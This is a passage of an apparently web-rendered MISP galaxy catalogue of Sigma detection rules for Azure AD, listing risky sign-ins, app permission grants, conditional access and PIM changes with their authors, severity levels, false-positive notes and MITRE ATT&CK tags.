logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

New Country

Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.

Internal MISP references

UUID adf9f4d2-559e-4f5c-95be-c28dff0b1476 which can be used as unique global reference for New Country in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_new_coutry_region.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Suspicious Inbox Forwarding Identity Protection

Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address

Internal MISP references

UUID 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d which can be used as unique global reference for Suspicious Inbox Forwarding Identity Protection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['A legitimate forwarding rule.']
filename azure_identity_protection_inbox_forwarding_rule.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1140', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Atypical Travel

Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

Internal MISP references

UUID 1a41023f-1e70-4026-921a-4d9341a9038e which can be used as unique global reference for Atypical Travel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_atypical_travel.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Primary Refresh Token Access Attempt

Indicates an access attempt to the Primary Refresh Token (PRT) resource, which can be used to move laterally within an organization or to perform credential theft.

Internal MISP references

UUID a84fc3b1-c9ce-4125-8e74-bdcdb24021f1 which can be used as unique global reference for Primary Refresh Token Access Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ["This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated."]
filename azure_identity_protection_prt_access.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Sign-In From Malware Infected IP

Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.

Internal MISP references

UUID 821b4dc3-1295-41e7-b157-39ab212dd6bd which can be used as unique global reference for Sign-In From Malware Infected IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['Using an IP address that is shared by many users']
filename azure_identity_protection_malware_linked_ip.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1090', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

Malicious IP Address Sign-In Suspicious

Indicates a sign-in from an IP address that was known to be malicious at the time of sign-in.

Internal MISP references

UUID 36440e1c-5c22-467a-889b-593e66498472 which can be used as unique global reference for Malicious IP Address Sign-In Suspicious in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_malicious_ip_address_suspicious.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1090', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

Unfamiliar Sign-In Properties

Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.

Internal MISP references

UUID 128faeef-79dd-44ca-b43c-a9e236a60f49 which can be used as unique global reference for Unfamiliar Sign-In Properties in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['User changing to a new device, location, browser, etc.']
filename azure_identity_protection_unfamilar_sign_in.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Malicious IP Address Sign-In Failure Rate

Indicates sign-in from a malicious IP address based on high failure rates.

Internal MISP references

UUID a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd which can be used as unique global reference for Malicious IP Address Sign-In Failure Rate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_malicious_ip_address.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1090', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

SAML Token Issuer Anomaly

Indicates that the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns.

Internal MISP references

UUID e3393cba-31f0-4207-831e-aef90ab17a8c which can be used as unique global reference for SAML Token Issuer Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_token_issuer_anomaly.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1606', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Azure AD Account Credential Leaked

Indicates that the user's valid credentials have been leaked.

Internal MISP references

UUID 19128e5e-4743-48dc-bd97-52e5775af817 which can be used as unique global reference for Azure AD Account Credential Leaked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['A rare hash collision.']
filename azure_identity_protection_leaked_credentials.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1589', 'attack.reconnaissance']
Related clusters

To see the related clusters, click here.

Anomalous Token

Indicates that there are abnormal characteristics in the token, such as an unusual token lifetime or a token that is replayed from an unfamiliar location.

Internal MISP references

UUID 6555754e-5e7f-4a67-ad1c-4041c413a007 which can be used as unique global reference for Anomalous Token in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow'
creation_date 2023/08/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_anomalous_token.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Azure AD Threat Intelligence

Indicates user activity that is unusual for the user or consistent with known attack patterns.

Internal MISP references

UUID a2cb56ff-4f46-437a-a0fa-ffa4d1303cba which can be used as unique global reference for Azure AD Threat Intelligence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/07
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_threat_intel.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Activity From Anonymous IP Address

Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

Internal MISP references

UUID be4d9c86-d702-4030-b52e-c7859110e5e8 which can be used as unique global reference for Activity From Anonymous IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_anonymous_ip_activity.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Impossible Travel

Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

Internal MISP references

UUID b2572bf9-e20a-4594-b528-40bde666525a which can be used as unique global reference for Impossible Travel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['Connecting to a VPN, performing activity and then dropping and performing additional activity.']
filename azure_identity_protection_impossible_travel.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Suspicious Browser Activity

Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser.

Internal MISP references

UUID 944f6adb-7a99-4c69-80c1-b712579e93e6 which can be used as unique global reference for Suspicious Browser Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_suspicious_browser.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Anomalous User Activity

Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.

Internal MISP references

UUID 258b6593-215d-4a26-a141-c8e31c1299a6 which can be used as unique global reference for Anomalous User Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_anomalous_user.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1098', 'attack.persistence']
Related clusters

To see the related clusters, click here.

End User Consent

Detects when an end user consents to an application.

Internal MISP references

UUID 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a which can be used as unique global reference for End User Consent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/28
falsepositive ['Unknown']
filename azure_app_end_user_consent.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

App Role Added

Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.

Internal MISP references

UUID b04934b2-0a68-4845-8a19-bdfed3a68a7a which can be used as unique global reference for App Role Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/19
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_role_added.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Change to Authentication Method

A change to an account's authentication method could be an indicator of an attacker adding an authentication method to the account so they can retain access.

Internal MISP references

UUID 4d78a000-ab52-4564-88a5-7ab5242b20c7 which can be used as unique global reference for Change to Authentication Method in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_change_to_authentication_method.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1556', 'attack.persistence', 'attack.defense_evasion', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Guest User Invited By Non Approved Inviters

Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.

Internal MISP references

UUID 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9 which can be used as unique global reference for Guest User Invited By Non Approved Inviters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/10
falsepositive ['A non malicious user is unaware of the proper process']
filename azure_guest_invite_failure.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Temporary Access Pass Added To An Account

Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated.

Internal MISP references

UUID fa84aaf5-8142-43cd-9ec2-78cfebf878ce which can be used as unique global reference for Temporary Access Pass Added To An Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/10
falsepositive ['Administrator adding a legitimate temporary access pass']
filename azure_tap_added.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Azure Subscription Permission Elevation Via AuditLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

Internal MISP references

UUID ca9bf243-465e-494a-9e54-bf9fc239057d which can be used as unique global reference for Azure Subscription Permission Elevation Via AuditLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/26
falsepositive ['If this was approved by System Administrator.']
filename azure_subscription_permissions_elevation_via_auditlogs.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Account Created And Deleted Within A Close Time Frame

Detects when an account was created and deleted in a short period of time.

Internal MISP references

UUID 6f583da0-3a90-4566-a4ed-83c09fe18bbf which can be used as unique global reference for Account Created And Deleted Within A Close Time Frame in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
creation_date 2022/08/11
falsepositive ['Legit administrative action']
filename azure_ad_account_created_deleted.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Bitlocker Key Retrieval

Monitor and alert for Bitlocker key retrieval.

Internal MISP references

UUID a0413867-daf3-43dd-9245-734b3a787942 which can be used as unique global reference for Bitlocker Key Retrieval in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_bitlocker_key_retrieval.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Added Owner To Application

Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.

Internal MISP references

UUID 74298991-9fc4-460e-a92e-511aa60baec1 which can be used as unique global reference for Added Owner To Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/02
falsepositive ['When a new application owner is added by an administrator']
filename azure_app_owner_added.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1552', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Password Reset By User Account

Detects when a user has reset their password in Azure AD.

Internal MISP references

UUID 340ee172-4b67-4fb4-832f-f961bdc1f3aa which can be used as unique global reference for Password Reset By User Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author YochanaHenderson, '@Yochana-H'
creation_date 2022/08/03
falsepositive ['If this was approved by System Administrator or confirmed user action.']
filename azure_user_password_change.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.credential_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

User Added To Group With CA Policy Modification Access

Monitor and alert on membership additions to groups that have CA policy modification access.

Internal MISP references

UUID 91c95675-1f27-46d0-bead-d1ae96b97cd3 which can be used as unique global reference for User Added To Group With CA Policy Modification Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'
creation_date 2022/08/04
falsepositive ['User removed from the group is approved']
filename azure_group_user_addition_ca_modification.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Azure Domain Federation Settings Modified

Identifies when a user or application modifies the federation settings on the domain.

Internal MISP references

UUID 352a54e1-74ba-4929-9d47-8193d67aba1e which can be used as unique global reference for Azure Domain Federation Settings Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/06
falsepositive ['Federation Settings being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_federation_modified.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Added Credentials to Existing Application

Detects when a new credential is added to an existing application. Any credentials added outside of expected processes could indicate a malicious actor intending to use those credentials.

Internal MISP references

UUID cbb67ecc-fb70-4467-9350-c910bdf7c628 which can be used as unique global reference for Added Credentials to Existing Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/05/26
falsepositive ['When credentials are added/removed as part of the normal working hours/workflows']
filename azure_app_credential_added.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1098.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Bulk Deletion Changes To Privileged Account Permissions

Detects when a user is removed from a privileged role. Bulk changes should be investigated.

Internal MISP references

UUID 102e11e3-2db5-4c9e-bc26-357d42585d21 which can be used as unique global reference for Bulk Deletion Changes To Privileged Account Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/05
falsepositive ['Legitimate administrator actions of removing members from a role']
filename azure_priviledged_role_assignment_bulk_change.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

User Added To Privilege Role

Detects when a user is added to a privileged role.

Internal MISP references

UUID 49a268a4-72f4-4e38-8a7b-885be690c5b5 which can be used as unique global reference for User Added To Privilege Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/06
falsepositive ['Legitimate administrator actions of adding members to a role']
filename azure_priviledged_role_assignment_add.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

App Granted Microsoft Permissions

Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD.

Internal MISP references

UUID c1d147ae-a951-48e5-8b41-dcd0170c7213 which can be used as unique global reference for App Granted Microsoft Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/10
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_permissions_msft.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

CA Policy Removed by Non Approved Actor

Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.

Internal MISP references

UUID 26e7c5e2-6545-481e-b7e6-050143459635 which can be used as unique global reference for CA Policy Removed by Non Approved Actor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Corissa Koopmans, '@corissalea'
creation_date 2022/07/19
falsepositive ['Misconfigured role permissions', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.']
filename azure_aad_secops_ca_policy_removedby_bad_actor.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

App Granted Privileged Delegated Or App Permissions

Detects when an administrator grants either application permissions (app roles) or highly privileged delegated permissions.

Internal MISP references

UUID 5aecf3d5-f8a0-48e7-99be-3a759df7358f which can be used as unique global reference for App Granted Privileged Delegated Or App Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/28
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_privileged_permissions.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

New CA Policy by Non-approved Actor

Monitor and alert on conditional access changes.

Internal MISP references

UUID 0922467f-db53-4348-b7bf-dee8d0d348c6 which can be used as unique global reference for New CA Policy by Non-approved Actor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Corissa Koopmans, '@corissalea'
creation_date 2022/07/18
falsepositive ['Misconfigured role permissions', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.']
filename azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1548']
Related clusters

To see the related clusters, click here.

CA Policy Updated by Non Approved Actor

Monitor and alert on conditional access changes. Is the initiating actor ("Initiated by") approved to make changes? Review the Modified Properties and compare the "old" and "new" values.

Internal MISP references

UUID 50a3c7aa-ec29-44a4-92c1-fce229eef6fc which can be used as unique global reference for CA Policy Updated by Non Approved Actor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Corissa Koopmans, '@corissalea'
creation_date 2022/07/19
falsepositive ['Misconfigured role permissions', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.']
filename azure_aad_secops_ca_policy_updatedby_bad_actor.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Changes To PIM Settings

Detects when changes are made to PIM roles.

Internal MISP references

UUID db6c06c4-bf3b-421c-aa88-15672b88c743 which can be used as unique global reference for Changes To PIM Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/09
falsepositive ['Legit administrative PIM setting configuration changes']
filename azure_pim_change_settings.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Users Added to Global or Device Admin Roles

Monitor and alert for users added to device admin roles.

Internal MISP references

UUID 11c767ae-500b-423b-bae3-b234450736ed which can be used as unique global reference for Users Added to Global or Device Admin Roles in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_users_added_to_device_admin_roles.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

User State Changed From Guest To Member

Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.

Internal MISP references

UUID 8dee7a0d-43fd-4b3c-8cd1-605e189d195e which can be used as unique global reference for User State Changed From Guest To Member in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/06/30
falsepositive ['If this was approved by System Administrator.']
filename azure_guest_to_member.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.t1078.004']

New Root Certificate Authority Added

Detects a newly added root certificate authority in an Azure AD tenant, added to support certificate-based authentication.

Internal MISP references

UUID 4bb80281-3756-4ec8-a88e-523c5a6fda9e which can be used as unique global reference for New Root Certificate Authority Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Shah Singh, '@cyb3rjy0t'
creation_date 2024/03/26
falsepositive ['Unknown']
filename azure_ad_new_root_ca_added.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1556']

PIM Alert Setting Changes To Disabled

Detects when PIM alerts are set to disabled.

Internal MISP references

UUID aeaef14c-e5bf-4690-a9c8-835caad458bd which can be used as unique global reference for PIM Alert Setting Changes To Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/09
falsepositive ['Administrator disabling PIM alerts as an active choice.']
filename azure_pim_alerts_disabled.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1078']

Certificate-Based Authentication Enabled

Detects when certificate-based authentication has been enabled in an Azure Active Directory tenant.

Internal MISP references

UUID c2496b41-16a9-4016-a776-b23f8910dc58 which can be used as unique global reference for Certificate-Based Authentication Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Shah Singh, '@cyb3rjy0t'
creation_date 2024/03/26
falsepositive ['Unknown']
filename azure_ad_certificate_based_authencation_enabled.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1556']

Application URI Configuration Changes

Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.

Internal MISP references

UUID 0055ad1f-be85-4798-83cf-a6da17c993b3 which can be used as unique global reference for Application URI Configuration Changes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/02
falsepositive ['When an administrator is making legitimate URI configuration changes to an application. This should be a planned event.']
filename azure_app_uri_modifications.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1528', 'attack.t1078.004', 'attack.persistence', 'attack.credential_access', 'attack.privilege_escalation']

Application AppID Uri Configuration Changes

Detects when a configuration change is made to an application's AppID URI.

Internal MISP references

UUID 1b45b0d1-773f-4f23-aedc-814b759563b1 which can be used as unique global reference for Application AppID Uri Configuration Changes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/02
falsepositive ['When an administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.']
filename azure_app_appid_uri_changes.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.credential_access', 'attack.privilege_escalation', 'attack.t1552', 'attack.t1078.004']

Guest Users Invited To Tenant By Non Approved Inviters

Detects guest users being invited to the tenant by non-approved inviters.

Internal MISP references

UUID 4ad97bf5-a514-41a4-abd3-4f3455ad4865 which can be used as unique global reference for Guest Users Invited To Tenant By Non Approved Inviters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']

PIM Approvals And Deny Elevation

Detects when a PIM elevation is approved or denied. Approvals or denials outside of normal operations should be investigated.

Internal MISP references

UUID 039a7469-0296-4450-84c0-f6966b16dc6d which can be used as unique global reference for PIM Approvals And Deny Elevation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
creation_date 2022/08/09
falsepositive ['Actual admin using PIM.']
filename azure_pim_activation_approve_deny.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.privilege_escalation', 'attack.t1078.004']

Delegated Permissions Granted For All Users

Detects when highly privileged delegated permissions are granted on behalf of all users.

Internal MISP references

UUID a6355fbe-f36f-45d8-8efc-ab42465cbc52 which can be used as unique global reference for Delegated Permissions Granted For All Users in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/28
falsepositive ['When the permission is legitimately needed for the app']
filename azure_app_delegated_permissions_all_users.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']

Changes to Device Registration Policy

Monitor and alert for changes to the device registration policy.

Internal MISP references

UUID 9494bff8-959f-4440-bbce-fb87a208d517 which can be used as unique global reference for Changes to Device Registration Policy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_device_registration_policy_changes.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1484']

Privileged Account Creation

Detects when a new admin is created.

